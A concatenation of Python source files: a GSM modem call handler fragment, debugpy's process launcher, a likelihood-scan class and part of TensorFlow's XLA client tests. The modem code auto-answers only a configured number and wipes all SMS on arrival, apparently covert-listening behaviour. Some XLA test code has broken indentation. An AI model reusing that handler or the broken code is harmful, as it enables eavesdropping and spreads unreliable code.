            if recv == 'OK':
                continue
            elif recv == 'RING':
                # Phone in
                serial_dict['SIM_PHO'] = 'Incoming'
            elif recv == 'NO DIALTONE' or recv == 'NO ANSWER':
                # Phone out and no answer
                serial_dict['SIM_PHO'] = 'Fail'
            elif recv == 'BUSY' or recv == 'NO CARRIER':
                # Phone close
                serial_dict['SIM_PHO'] = 'Close'
            # BUG FIX: the original compared recv[0:4] (4 characters) against
            # the 5-character prefixes '+CLCC'/'+CMTI', so these branches
            # could never match; use startswith() instead.
            elif recv.startswith('+CLCC'):
                # Connect status update.
                fields = recv.split(',')
                # BUG FIX: keep the parsed fields separate from the outgoing
                # AT command; the original overwrote AT with "ATA"/"ATH" and
                # then read AT[1], so the status check always hit 'Waiting'.
                if fields[5].strip('"') == serial_dict['PHONE']:
                    # Receive call from target: answer it.
                    sim_serial.write("ATA".encode("utf-8"))
                    time.sleep(0.2)
                else:
                    # Receive call from stranger: hang up.
                    sim_serial.write("ATH".encode("utf-8"))
                    time.sleep(0.2)
                # Set LED-light status from the call-state field.
                if fields[1] == "0":
                    serial_dict['SIM_STA'] = 'On'
                elif fields[1] == "6":
                    serial_dict['SIM_STA'] = 'Close'
                else:
                    serial_dict['SIM_STA'] = 'Waiting'
            elif recv.startswith('+CMTI'):
                # Receive message notification: delete all stored SMS.
                sim_serial.write('AT+CMGD="DEL ALL"'.encode("utf-8"))
                time.sleep(0.2)
            # Analysis end
|
debuggee.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import atexit
import os
import struct
import subprocess
import sys
import threading
from debugpy import launcher
from debugpy.common import fmt, log, messaging, compat
from debugpy.launcher import output
# Module state shared between spawn(), kill() and wait_for_exit().
process = None
"""subprocess.Popen instance for the debuggee process."""

wait_on_exit_predicates = []
"""List of functions that determine whether to pause after debuggee process exits.
Every function is invoked with exit code as the argument. If any of the functions
returns True, the launcher pauses and waits for user input before exiting.
"""
def describe():
    # Human-readable tag for log messages, e.g. "Debuggee[PID=1234]".
    # Assumes spawn() has already set the module-level `process`.
    return fmt("Debuggee[PID={0}]", process.pid)
def spawn(process_name, cmdline, cwd, env, redirect_output):
    """Spawns the debuggee process and begins supervising it.

    Sends the DAP "process" event once spawned, optionally redirects the
    child's stdout/stderr through our own pipes for capture, registers an
    atexit kill, and starts a daemon thread waiting for the child to exit.

    Raises:
        messaging.MessageHandlingError: if the process cannot be spawned.
    """
    log.info(
        "Spawning debuggee process:\n\n"
        "Current directory: {0!j}\n\n"
        "Command line: {1!j}\n\n"
        "Environment variables: {2!j}\n\n",
        cwd,
        cmdline,
        env,
    )
    # All fds created here that are NOT handed off to a CaptureOutput
    # reader get closed in the finally block below.
    close_fds = set()
    try:
        if redirect_output:
            # subprocess.PIPE behavior can vary substantially depending on Python version
            # and platform; using our own pipes keeps it simple, predictable, and fast.
            stdout_r, stdout_w = os.pipe()
            stderr_r, stderr_w = os.pipe()
            close_fds |= {stdout_r, stdout_w, stderr_r, stderr_w}
            kwargs = dict(stdout=stdout_w, stderr=stderr_w)
        else:
            kwargs = {}
        try:
            global process
            process = subprocess.Popen(cmdline, cwd=cwd, env=env, bufsize=0, **kwargs)
        except Exception as exc:
            raise messaging.MessageHandlingError(
                fmt("Couldn't spawn debuggee: {0}\n\nCommand line:{1!r}", exc, cmdline)
            )
        log.info("Spawned {0}.", describe())
        # Ensure the child doesn't outlive the launcher.
        atexit.register(kill)
        launcher.channel.send_event(
            "process",
            {
                "startMethod": "launch",
                "isLocalProcess": True,
                "systemProcessId": process.pid,
                "name": process_name,
                # Pointer size in bits (32/64) of THIS interpreter.
                "pointerSize": struct.calcsize(compat.force_str("P")) * 8,
            },
        )
        if redirect_output:
            for category, fd, tee in [
                ("stdout", stdout_r, sys.stdout),
                ("stderr", stderr_r, sys.stderr),
            ]:
                # CaptureOutput takes ownership of the read end; don't close it.
                output.CaptureOutput(describe(), category, fd, tee)
                close_fds.remove(fd)
        wait_thread = threading.Thread(target=wait_for_exit, name="wait_for_exit()")
        wait_thread.daemon = True
        wait_thread.start()
    finally:
        # Close the write ends (now owned by the child) and anything unused.
        for fd in close_fds:
            try:
                os.close(fd)
            except Exception:
                log.swallow_exception()
def kill():
    """Best-effort kill of the debuggee.

    No-op when the debuggee was never spawned; errors (e.g. the process
    already exited) are logged and swallowed.
    """
    if process is None:
        return
    try:
        still_running = process.poll() is None
        if still_running:
            log.info("Killing {0}", describe())
            process.kill()
    except Exception:
        log.swallow_exception("Failed to kill {0}", describe())
def wait_for_exit():
    """Waits for the debuggee to exit, then reports its exit code.

    Flushes captured output, optionally pauses for user input (per
    wait_on_exit_predicates), and sends the DAP "exited" and "terminated"
    events. Runs on a daemon thread started by spawn().
    """
    try:
        code = process.wait()
        if sys.platform != "win32" and code < 0:
            # On POSIX, if the process was terminated by a signal, Popen will use
            # a negative returncode to indicate that - but the actual exit code of
            # the process is always an unsigned number, and can be determined by
            # taking the lowest 8 bits of that negative returncode.
            code &= 0xFF
    except Exception:
        log.swallow_exception("Couldn't determine process exit code:")
        code = -1
    log.info("{0} exited with code {1}", describe(), code)
    output.wait_for_remaining_output()
    # Determine whether we should wait or not before sending "exited", so that any
    # follow-up "terminate" requests don't affect the predicates.
    should_wait = any(pred(code) for pred in wait_on_exit_predicates)
    # The channel may already be down; the events are best-effort.
    try:
        launcher.channel.send_event("exited", {"exitCode": code})
    except Exception:
        pass
    if should_wait:
        _wait_for_user_input()
    try:
        launcher.channel.send_event("terminated")
    except Exception:
        pass
def _wait_for_user_input():
    """Blocks until the user presses a key (or Enter).

    Used to keep the console window open after the debuggee exits. Only
    waits when both stdout and stdin are usable; uses msvcrt.getch() on a
    Windows tty, plain stdin.read(1) otherwise.
    """
    if sys.stdout and sys.stdin:
        # (fix) removed the redundant `from debugpy.common import log` here;
        # `log` is already imported at module level.
        can_getch = sys.stdin.isatty()
        if can_getch:
            # msvcrt only exists on Windows; its absence selects read() mode.
            try:
                import msvcrt
            except ImportError:
                can_getch = False
        if can_getch:
            log.debug("msvcrt available - waiting for user input via getch()")
            sys.stdout.write("Press any key to continue . . . ")
            sys.stdout.flush()
            msvcrt.getch()
        else:
            log.debug("msvcrt not available - waiting for user input via read()")
            sys.stdout.write("Press Enter to continue . . . ")
            sys.stdout.flush()
            sys.stdin.read(1)
|
scan.py | import time
from numpy.linalg import norm
import numpy as np
from multiprocessing import Process, Manager, Lock, Pool
from ctypes import c_int
from itertools import product
import pandas as pd
# Module-level lock guarding the shared Ntot counter across worker processes.
Ntotlock = Lock()
class Scan:
    """Base class for likelihood scans over a rectangular parameter box.

    Stores accepted points and their likelihood values, and provides serial
    and multiprocessing drivers, inverse-distance interpolation, expectation
    values, and simple text/CSV output. Subclasses must implement run().
    """

    def __init__(self, likelihood, par_min, par_max, N_iters):
        """Initializes the scan.

        Args:
            likelihood: Callable evaluating the likelihood of a point.
            par_min: Lower bound(s); a single number for a 1-D scan, or a
                sequence of per-parameter bounds. (Generalized: ints are now
                accepted as well as floats for the 1-D case.)
            par_max: Upper bound(s); must match par_min in length.
            N_iters: Number of iterations for the scan driver.

        Raises:
            ValueError: If par_min and par_max lengths differ. (Was a bare
                Exception; ValueError is a subclass, so existing
                `except Exception` callers still work.)
        """
        self.likelihood = likelihood
        if isinstance(par_min, (int, float)) and isinstance(par_max, (int, float)):
            self.Npars = 1
            self.par_min = [par_min, ]
            self.par_max = [par_max, ]
        elif len(par_min) == len(par_max):
            self.Npars = len(par_min)
            self.par_min = par_min
            self.par_max = par_max
        else:
            raise ValueError("The length of the limits of the parameter doesn't match!")
        self.N_iters = N_iters
        self.points = []       # accepted points (lists of Npars coordinates)
        self.lh_list = []      # likelihood value for each accepted point
        self.Ntot = 0          # total points evaluated (int, or mp Value)
        self.mp = False        # True while run_mp() is active

    def run(self, *args):
        """Performs the scan; must be overridden by subclasses."""
        raise NotImplementedError("You have to define the scan")

    def run_time(self, *args):
        """Runs the scan and prints the elapsed wall-clock time."""
        self.start = time.time()
        self.run(*args)
        self.end = time.time()
        print("Running time: " + str(self.end-self.start) + 's')

    def increasecounter(self, Ntot):
        """Adds Ntot to the total-evaluations counter (lock-protected in mp mode)."""
        if self.mp:
            with Ntotlock:
                self.Ntot.value += Ntot
        else:
            self.Ntot += Ntot

    def run_mp(self, cores, *args):
        """Runs the scan on `cores` processes, sharing state via a Manager."""
        self.mp = True
        with Manager() as manager:
            # Replace plain containers with manager proxies so workers share them.
            self.points = manager.list(self.points)
            self.lh_list = manager.list(self.lh_list)
            self.Ntot = manager.Value(c_int, self.Ntot)
            processes = []
            for i in range(0, cores):
                p = Process(target = self.run, args = args)
                p.start()
                # NOTE(review): this seed call executes in the *parent*, not in
                # the child just started, so it likely does not achieve the
                # stated per-process reseeding — confirm and move the seeding
                # into the worker if needed.
                np.random.seed(int(p.pid + time.time()))  # We have to reseed each process, or else they will produce the same random numbers
                processes.append(p)
            for p in processes:
                p.join()
            # Copy results back into ordinary Python objects before the
            # manager shuts down.
            self.points = list(self.points)
            self.lh_list = list(self.lh_list)
            self.Ntot = int(self.Ntot.value)
        self.mp = False

    def run_mp_time(self, cores):
        """Runs the multiprocessing scan and prints the elapsed time."""
        self.start = time.time()
        self.run_mp(cores)
        self.end = time.time()
        print("Running time: " + str(self.end-self.start) + 's')

    def clear(self):
        """Discards all accumulated points, likelihoods and counters."""
        self.points = []
        self.lh_list = []
        self.Ntot = 0

    def get_points(self):
        """Returns the list of accepted points."""
        return self.points

    def get_lh_list(self, index=None):
        """Returns the likelihood list, or component `index` of each entry.

        (Fixed: `index == None` -> `index is None`; identity comparison is
        the correct idiom and avoids elementwise surprises with array-like
        indices.)
        """
        if index is None:
            return self.lh_list
        else:
            s = []
            for i in range(0, len(self.lh_list)):
                s.append(self.lh_list[i][index])
            return s

    def get_point_series(self, coord):
        """Returns coordinate `coord` of every accepted point."""
        s = []
        for i in range(0, len(self.points)):
            s.append(self.points[i][coord])
        return s

    def interpolate(self, point):
        """Inverse-distance (power 4) interpolation of the likelihood at `point`.

        Returns the stored value exactly when `point` coincides with an
        accepted point.
        """
        num = 0
        den = 0
        for i in range(0, len(self.points)):
            d = norm(np.array(point) - np.array(self.points[i]))
            if d == 0:
                return self.lh_list[i]
            else:
                num += self.lh_list[i]/d**4
                den += 1/d**4
        return num/den

    def write(self, fout, mode='wt'):
        """Writes tab-separated "par_1 ... par_N likelihood" lines to fout."""
        with open(fout, mode) as f:
            for p, l in zip(self.points, self.lh_list):
                for i in range(0, self.Npars):
                    f.write(str(p[i])+'\t')
                f.write(str(l)+'\n')

    def save_csv(self, fout):
        """Saves points and likelihoods as a tab-separated CSV via pandas.

        NOTE(review): column labels are hard-coded to ['x','y'] — only
        correct for Npars == 2; confirm before relying on the header.
        """
        df_points = pd.DataFrame(self.points, columns=['x','y'])
        df_lh = pd.DataFrame(self.lh_list)
        df_total = pd.concat([df_points, df_lh], axis=1, join='outer')
        df_total.to_csv(fout, sep='\t', index=False)

    def inthebox(self, point):
        """Returns True iff `point` lies within [par_min, par_max] in every dim."""
        for p in range(0, self.Npars):
            if point[p] < self.par_min[p]:
                return False
            if point[p] > self.par_max[p]:
                return False
        return True

    def acceptance(self):
        """Returns the fraction of evaluated points that were accepted."""
        return len(self.points)/self.Ntot

    def bestpoint(self):
        """Returns the accepted point with the highest likelihood."""
        return self.points[np.argmax(self.lh_list)]

    def expectedvalue(self, func, *args):
        """Likelihood-weighted expectation of func over the accepted points.

        Weights are exp(l - max(l)) for numerical stability, i.e. lh_list is
        treated as log-likelihoods here.
        """
        lhmax = np.max(self.lh_list)
        num = 0
        den = 0
        for p, l in zip(self.points, self.lh_list):
            expl = np.exp(l-lhmax)
            num += func(p, *args) * expl
            den += expl
        return num/den

    def expectedvalue_mp(self, func, cores, *args):
        """Parallel version of expectedvalue() using a process Pool."""
        lhmax = np.max(self.lh_list)
        num = 0
        den = 0
        with Pool(processes=cores) as pool:
            # Evaluate func over the product of points and the extra args.
            argl = []
            for arg in args:
                argl.append([arg])
            flist = pool.starmap(func, product(self.points, *argl))
            for i, l in enumerate(self.lh_list):
                expl = np.exp(l-lhmax)
                num += flist[i] * expl
                den += expl
        return num/den
|
xla_client_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend, cloud_tpu=False, tfrt_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_]
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
  """Convenience wrapper to create Numpy arrays with a np.bool_ dtype.

  Uses `np.bool_` rather than the deprecated `np.bool` alias: the alias was
  removed in NumPy 1.24, so the previous spelling raised AttributeError at
  call time on modern NumPy. Behavior is otherwise unchanged (`np.bool` was
  an alias of the builtin `bool`, and `np.array(..., dtype=bool)` produces
  the same `bool_`-typed array).
  """
  return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
  """Tests for inspecting compiled computations: HLO text, protos, and costs."""

  def setUp(self):
    super(ComputationPrinting, self).setUp()
    self.backend = xla_backend()

  def ExampleComputation(self):
    """Builds a small example computation: (p0 * p1) + (p0 * p1)."""
    builder = xla_client.XlaBuilder("acomputation")
    p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
    p1 = ops.Parameter(
        builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
    x = ops.Mul(p0, p1)
    ops.Add(x, x)
    return builder.build()

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testCompiledHloModuleToHloText(self):
    computation = self.ExampleComputation()
    executable = self.backend.compile(computation)
    hlo_modules = executable.hlo_modules()
    self.assertLen(hlo_modules, 1)
    hlo_text = hlo_modules[0].to_string()
    self.assertTrue(hlo_text.startswith("HloModule acomputation"))
    # The mul/add pair is expected to be fused by the compiler.
    self.assertIn("fusion", hlo_text)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testCompiledHloModuleAsSerializedProto(self):
    # Round-trips the compiled module through its serialized proto and checks
    # the textual form is unchanged.
    computation = self.ExampleComputation()
    executable = self.backend.compile(computation)
    hlo_modules = executable.hlo_modules()
    self.assertLen(hlo_modules, 1)
    hlo_text = hlo_modules[0].to_string()
    proto = hlo_modules[0].as_serialized_hlo_module_proto()
    hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
    hlo_text_roundtrip = hlo_module_roundtrip.to_string()
    self.assertEqual(hlo_text, hlo_text_roundtrip)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testFlopEstimate(self):
    computation = self.ExampleComputation()
    properties = xla_client._xla.hlo_module_cost_analysis(
        self.backend, computation.as_hlo_module())
    # A 4-element multiply plus a 4-element add = 8 flops.
    self.assertEqual(properties["flops"], 8.0)


tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
  """Tests focusing on Constant ops."""

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testConstantScalarSum(self, dtype):
    if dtype == np.int8 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support int8")
    c = self._NewComputation()
    ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
    self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConstantVectorMul(self, dtype):
    c = self._NewComputation()
    ops.Mul(
        ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
        ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
    # Loose rtol: low-precision float dtypes need extra slack.
    self._ExecuteAndCompareClose(
        c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConstantVectorScalarDiv(self, dtype):
    c = self._NewComputation()
    ops.Div(
        ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
        ops.Constant(c, dtype(2.0)))
    self._ExecuteAndCompareClose(
        c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConstantVectorScalarPow(self, dtype):
    c = self._NewComputation()
    ops.Pow(
        ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
        ops.Constant(c, dtype(2.)))
    self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])

  def testIota(self):
    # Rank-1 iota: 0..9 as float32.
    c = self._NewComputation()
    ops.Iota(c, xla_client.PrimitiveType.F32, 10)
    self._ExecuteAndCompareExact(
        c, expected=[np.arange(10, dtype=np.float32)])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes)
  def testBroadcastedIota(self, dtype):
    # Iota along dimension 1 of a (2, 3) shape.
    c = self._NewComputation()
    shape = xla_client.Shape.array_shape(
        xla_client.dtype_to_etype(dtype), (2, 3))
    ops.Iota(c, shape, 1)
    expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
    self._ExecuteAndCompareExact(c, expected=[expected])

  def testBooleanAnd(self):
    c = self._NewComputation()
    ops.And(
        ops.Constant(c, NumpyArrayBool([True, False, True, False])),
        ops.Constant(c, NumpyArrayBool([True, True, False, False])))
    self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])

  def testBooleanOr(self):
    c = self._NewComputation()
    ops.Or(
        ops.Constant(c, NumpyArrayBool([True, False, True, False])),
        ops.Constant(c, NumpyArrayBool([True, True, False, False])))
    self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])

  def testBooleanXor(self):
    c = self._NewComputation()
    ops.Xor(
        ops.Constant(c, NumpyArrayBool([True, False, True, False])),
        ops.Constant(c, NumpyArrayBool([True, True, False, False])))
    self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSum2D(self, dtype):
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
        ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
    self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])

  def testShiftLeft(self):
    # 3 << 2 == 12.
    c = self._NewComputation()
    ops.ShiftLeft(
        ops.Constant(c, NumpyArrayS32([3])),
        ops.Constant(c, NumpyArrayS32([2])))
    self._ExecuteAndCompareClose(c, expected=[[12]])

  def testShiftRightArithmetic(self):
    # Arithmetic shift preserves the sign bit: -2 >> 1 == -1.
    c = self._NewComputation()
    ops.ShiftRightArithmetic(
        ops.Constant(c, NumpyArrayS32([-2])),
        ops.Constant(c, NumpyArrayS32([1])))
    self._ExecuteAndCompareClose(c, expected=[[-1]])

  def testShiftRightLogical(self):
    # Logical shift treats the bits as unsigned: -1 >>> 1 == 2**31 - 1.
    c = self._NewComputation()
    ops.ShiftRightLogical(
        ops.Constant(c, NumpyArrayS32([-1])),
        ops.Constant(c, NumpyArrayS32([1])))
    self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSum2DWith1DBroadcastDim0(self, dtype):
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 0 to match the former's shape.
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c,
                     np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                              dtype=dtype)),
        ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareClose(
        c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSum2DWith1DBroadcastDim1(self, dtype):
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 1 to match the former's shape.
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c,
                     np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                              dtype=dtype)),
        ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareClose(
        c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConstantAxpy(self, dtype):
    # a*x + y with constant operands.
    c = self._NewComputation()
    ops.Add(
        ops.Mul(
            ops.Constant(c, dtype(2)),
            ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
        ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
    self._ExecuteAndCompareClose(
        c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)

  def testCustomCall(self):
    # Registers the test CPU custom-call targets and invokes one of them.
    if self.backend.platform != "cpu":
      self.skipTest("Test requires cpu platform")
    c = self._NewComputation()
    for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
      xla_client.register_custom_call_target(name, fn, platform="cpu")
    ops.CustomCallWithLayout(
        c,
        b"test_subtract_f32",
        operands=[
            ops.Constant(c, np.float32(1.25)),
            ops.Constant(c, np.float32(0.5))
        ],
        shape_with_layout=xla_client.Shape.array_shape(
            np.dtype(np.float32), (), ()),
        operand_shapes_with_layout=[
            xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
            xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
        ])
    self._ExecuteAndCompareClose(c, expected=[0.75])


tests.append(ComputationsWithConstantsTest)
class ComputationFromProtoTest(absltest.TestCase):
  """Test computation execution from HLO proto."""

  def setUp(self):
    super(ComputationFromProtoTest, self).setUp()
    self.backend = xla_backend()

  def testExecuteFromProto(self):
    # Build a tiny computation (1 + 2) and serialize it to an HLO proto.
    builder = xla_client.XlaBuilder("computation")
    ops.Add(ops.Constant(builder, np.int32(1)), ops.Constant(builder, np.int32(2)))
    serialized_proto = builder.build().as_serialized_hlo_module_proto()
    # Deserialize the proto, compile, execute, and check the result.
    computation = xla_client.XlaComputation(serialized_proto)
    compiled = self.backend.compile(computation)
    result, = xla_client.execute_with_python_values(
        compiled, (), backend=self.backend)
    np.testing.assert_equal(result, np.int32(3))


tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
  """Tests focusing on Parameter ops and argument-passing."""

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes)
  def testScalarTimesVector(self, dtype):
    # Scalar parameter broadcast-multiplied with a vector parameter.
    c = self._NewComputation()
    arg0 = np.array(3, dtype=dtype)
    arg1 = np.array([10, 15, -2, 7], dtype=dtype)
    p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
    p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
    ops.Mul(p0, p1)
    self._ExecuteAndCompareExact(
        c, arguments=[arg0, arg1], expected=[arg0 * arg1])

  # TODO(phawkins): test comparison harness doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testScalarMinusVectorExplicitNumbering(self, dtype):
    # Use explicit numbering and pass parameter_num first. Sub is used since
    # it's not commutative and can help catch parameter reversal within the
    # computation.
    c = self._NewComputation()
    arg0 = np.array(2.0, dtype=dtype)
    arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
    p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
    p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
    ops.Sub(p1, p0)
    self._ExecuteAndCompareClose(
        c, arguments=[arg0, arg1], expected=[arg1 - arg0])


tests.append(ParametersTest)
class BufferTest(ComputationTest):
  """Tests focusing on execution with Buffers."""

  def testConstantSum(self):
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
    self._ExecuteAndCompareClose(c, expected=[4.25])

  def testOneParameterSum(self):
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Constant(c, np.float32(3.14)))
    self._ExecuteAndCompareClose(
        c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])

  def testTwoParameterSum(self):
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
    self._ExecuteAndCompareClose(
        c,
        arguments=[NumpyArrayF32(1.11),
                   NumpyArrayF32(3.14)],
        expected=[4.25])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testCannotCallWithDeletedBuffers(self):
    # Executing with an explicitly deleted argument buffer must raise.
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Constant(c, np.float32(3.14)))
    arg = NumpyArrayF32(1.11)
    compiled_c = self.backend.compile(c.build())
    arg_buffer = self.backend.buffer_from_pyval(arg)
    arg_buffer.delete()
    with self.assertRaises(RuntimeError):
      compiled_c.execute([arg_buffer])

  def testXlaShape(self):
    # The device buffer reports the XLA shape of the value it holds.
    pyval = np.array([[1., 2.]], np.float32)
    local_buffer = self.backend.buffer_from_pyval(pyval)
    xla_shape = local_buffer.xla_shape()
    self.assertEqual(xla_shape.dimensions(), (1, 2))
    self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))

  def testBlockHostUntilReadyWorks(self):
    arg = np.array([[1., 2.]], np.float32)
    arg_buffer = self.backend.buffer_from_pyval(arg)
    arg_buffer.block_host_until_ready()
    # This test merely checks that nothing goes awry when we call
    # block_host_until_ready(); it's difficult to test anything else.

  def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
    arg = np.array([[1., 2.]], np.float32)
    buffer = self.backend.buffer_from_pyval(arg)
    buffer.delete()
